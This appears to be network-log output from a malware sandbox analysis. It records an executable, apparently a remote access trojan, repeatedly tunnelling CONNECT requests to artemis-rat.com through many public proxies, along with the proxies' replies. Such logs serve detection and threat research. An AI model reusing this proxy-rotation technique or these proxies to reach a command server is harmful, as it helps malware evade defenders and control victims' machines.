                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1122192.168.2.55304266.207.184.7354323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.359504938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.575198889 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1123192.168.2.55302240.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.367286921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1124192.168.2.551169121.204.179.7077773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.367700100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.975516081 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1125192.168.2.551048167.71.210.23431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.373447895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505565882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.608275890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.717577934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1126192.168.2.552888103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.374037981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1127192.168.2.552961111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.377927065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1128192.168.2.55307850.199.46.20321003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.378493071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1129192.168.2.55300020.111.54.1681233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.385641098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.677930117 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1130192.168.2.553131104.25.108.120803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.386029959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.540323973 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1131192.168.2.553129104.16.105.142803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.386641979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.541336060 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1132192.168.2.55298558.234.116.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.387958050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1133192.168.2.55298843.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.390767097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1134192.168.2.552984195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.399040937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1135192.168.2.553178104.18.161.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.400348902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.554366112 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1136192.168.2.55305282.113.157.122312803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.400348902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.127326012 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1137192.168.2.553185104.17.66.69803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.403259993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.557300091 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1138192.168.2.552983171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.403485060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1139192.168.2.55111345.230.48.1319993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.407080889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.498730898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.054064035 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1140192.168.2.553183162.159.242.158803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.407107115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.967602968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.129231930 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1141192.168.2.55298243.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.409071922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1142192.168.2.552479139.162.181.177608443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.418032885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505712986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.608269930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.717598915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1143192.168.2.553219104.24.15.158803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.419583082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.574657917 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
